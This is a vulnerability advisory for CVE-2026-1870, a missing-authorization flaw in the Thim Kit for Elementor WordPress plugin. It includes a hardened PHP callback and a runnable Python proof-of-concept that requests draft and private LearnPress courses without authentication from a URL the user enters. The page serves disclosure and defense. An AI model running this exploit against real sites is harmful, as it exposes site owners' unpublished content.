Security Vulnerability Report
CVE-2026-1870 CVSS 5.3 MEDIUM

Published: 2026-03-16 14:18:08
Last Modified: 2026-04-22 21:30:26

Description

The Thim Kit for Elementor – Pre-built Templates & Widgets for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to missing validation checks on the 'thim-ekit/archive-course/get-courses' REST endpoint callback function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to disclose private or draft LearnPress course content by supplying post_status in the params_url payload.
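As an added illustration (not the plugin's own code and not its patch), the hardened shape of such a REST callback in PHP: the post_status filter is set server-side and a caller-supplied value is only honoured for users allowed to read private posts. The function names, the params_url handling and the read_private_posts capability are assumptions; LearnPress may map its own capability for courses.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: thim_example_*.
// The unsafe shape, for contrast: query args copied from the request, so an
// anonymous caller can set post_status=draft or private.
function thim_example_get_courses_unsafe( WP_REST_Request $request ) {
    $args              = (array) $request->get_param( 'params_url' );
    $args['post_type'] = 'lp_course';
    return rest_ensure_response( get_posts( $args ) );
}

// Hardened shape: accept only known arguments, default to published posts and
// widen the status filter only for a capable user.
function thim_example_get_courses( WP_REST_Request $request ) {
    $params = (array) $request->get_param( 'params_url' );

    $args = array(
        'post_type'      => 'lp_course',
        'post_status'    => 'publish',
        'posts_per_page' => min( 50, max( 1, absint( $params['posts_per_page'] ?? 10 ) ) ),
        'paged'          => max( 1, absint( $params['paged'] ?? 1 ) ),
    );

    // Capability name is an assumption; use the one that guards private courses.
    $requested = isset( $params['post_status'] ) ? sanitize_key( $params['post_status'] ) : 'publish';
    if ( 'publish' !== $requested && current_user_can( 'read_private_posts' ) ) {
        $args['post_status'] = $requested;
    }

    $courses = array();
    foreach ( get_posts( $args ) as $post ) {
        $courses[] = array(
            'id'    => $post->ID,
            'title' => get_the_title( $post ),
        );
    }
    return rest_ensure_response( array( 'data' => $courses ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'thim-ekit', '/archive-course/get-courses', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'thim_example_get_courses',
        // A public course listing is intended, so anyone may call the route;
        // the server-side status filter above is what keeps non-public posts out.
        'permission_callback' => '__return_true',
    ) );
} );
```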

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Thim Kit for Elementor (WordPress plugin) <= 1.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

target = input("Enter target URL (e.g., https://example.com): ").rstrip('/')
endpoint = "/wp-json/thim-ekit/archive-course/get-courses"

# PoC: Query draft/private LearnPress course content without authentication
payloads = {
    "draft": {
        "params_url": {
            "post_status": "draft",
            "posts_per_page": 10,
            "post_type": "lp_course"
        }
    },
    "private": {
        "params_url": {
            "post_status": "private",
            "posts_per_page": 10,
            "post_type": "lp_course"
        }
    }
}

print(f"[*] Target: {target}")
print(f"[*] Endpoint: {endpoint}")
print("=" * 60)

for status_name, params in payloads.items():
    print(f"\n[+] Testing post_status={status_name}...")
    url = f"{target}{endpoint}"
    try:
        resp = requests.get(url, params=params, timeout=10)
        print(f"    Status Code: {resp.status_code}")
        if resp.status_code == 200:
            data = resp.json()
            if data.get("data"):
                print(f"    [!] Vulnerable! Found {len(data.get('data', []))} course(s):")
                for course in data.get("data", []):
                    print(f"      - ID: {course.get('id')}, Title: {course.get('title', {}).get('rendered', 'N/A')}")
            else:
                print(f"    [-] No courses returned for status: {status_name}")
        else:
            print(f"    [-] Unexpected response: {resp.text[:200]}")
    except Exception as e:
        print(f"    [!] Error: {e}")

print("\n[*] PoC completed.")
```

References

Weakness: CWE-862 (Missing Authorization)
Source: Wordfence (secondary CVSS v3.1 metrics); NVD status: Deferred

- https://plugins.trac.wordpress.org/changeset/3467195/thim-elementor-kit
- https://www.wordfence.com/threat-intel/vulnerabilities/id/7c82577a-e7ee-4549-8d0f-bed09effa035?source=cve